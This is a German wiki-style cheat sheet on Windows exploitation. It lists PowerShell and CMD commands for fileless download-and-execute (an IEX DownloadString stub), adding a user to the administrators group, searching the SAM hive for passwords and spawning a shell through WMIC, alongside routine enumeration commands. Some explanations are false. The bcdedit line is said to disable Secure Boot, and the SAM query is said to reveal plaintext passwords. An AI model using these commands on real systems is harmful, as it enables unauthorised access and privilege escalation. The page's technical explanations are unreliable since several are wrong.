Grundlagen der Windows-Exploitation: Unterschied zwischen den Versionen
(Die Seite wurde neu angelegt: „==Einleitung== '''Hinweis:''' In diesem Artikel wird zusammengefasst, wie typische Angriffsvektoren auf Windows-Systeme aussehen. Dabei geht es um die Nutzu…“) |
(kein Unterschied)
|
Aktuelle Version vom 27. April 2025, 05:29 Uhr
Einleitung
Hinweis: In diesem Artikel wird zusammengefasst, wie typische Angriffsvektoren auf Windows-Systeme aussehen. Dabei geht es um die Nutzung von PowerShell und der Eingabeaufforderung (CMD), Methoden zur Rechteausweitung (Privilege Escalation) sowie das gezielte Ausnutzen von Windows-Funktionen. Die Befehle dienen ausschließlich zu Lernzwecken in abgesicherten Testumgebungen.
Was ist Windows-Exploitation?
Windows-Exploitation ist der Prozess, bei dem Schwachstellen (Vulnerabilities) im Windows-Betriebssystem oder in seiner Software ausgenutzt werden, um unautorisierten Zugriff, Kontrolle oder Daten von einem Computer zu erlangen. Angreifer verwenden Werkzeuge wie die Eingabeaufforderung (CMD) und PowerShell, um Befehle auszuführen, Skripte zu starten oder sich im Netzwerk zu bewegen.
PowerShell bei der Ausnutzung
PowerShell Grundlagen
"PowerShell ist ein Skriptwerkzeug für Administratoren."
- Führt Befehle auf entfernten Systemen aus.
- Invoke-Command
- Richtet den Fernzugriff ein.
- Enable-PSRemoting
PowerShell bei dateilosen Angriffen
"Wird für dateilose Angriffe verwendet!"
- Lädt Skripte herunter und führt sie aus.
- IEX (New-Object Net.WebClient).DownloadString
Privilegienerweiterung (Erlangen von Administratorrechten)
Wichtige Befehle
- Zeigt aktuelle Berechtigungen an.
- whoami /priv
- Fügt einen Benutzer der Administratorgruppe hinzu.
- net localgroup administrators <Benutzer> /add
Warum das wichtig ist
Privilegienerweiterung ist der Schlüssel, um vollständige Kontrolle über das System zu erlangen und Befehle als Administrator auszuführen.
Ausnutzen von Windows-Funktionen
- Überprüfen, ob Klartextpasswörter in der Registry gespeichert sind.
- reg query HKLM\SAM /f "password"
- Deaktiviert den Schutz beim sicheren Start (Secure Boot).
- bcdedit /set {current} bootstatuspolicy ignoreallfailures
- Führt eine versteckte Eingabeaufforderung (CMD) aus.
- wmic process call create "cmd.exe"
CMD-Grundlagen für die Ausnutzung
- Aktuellen Benutzer anzeigen.
- whoami
- Alle Systembenutzer auflisten.
- net user
- Laufende Prozesse anzeigen.
- tasklist
- Einen Prozess beenden.
- taskkill /PID <id>
- Aktive Netzwerkverbindungen anzeigen.
- netstat -ano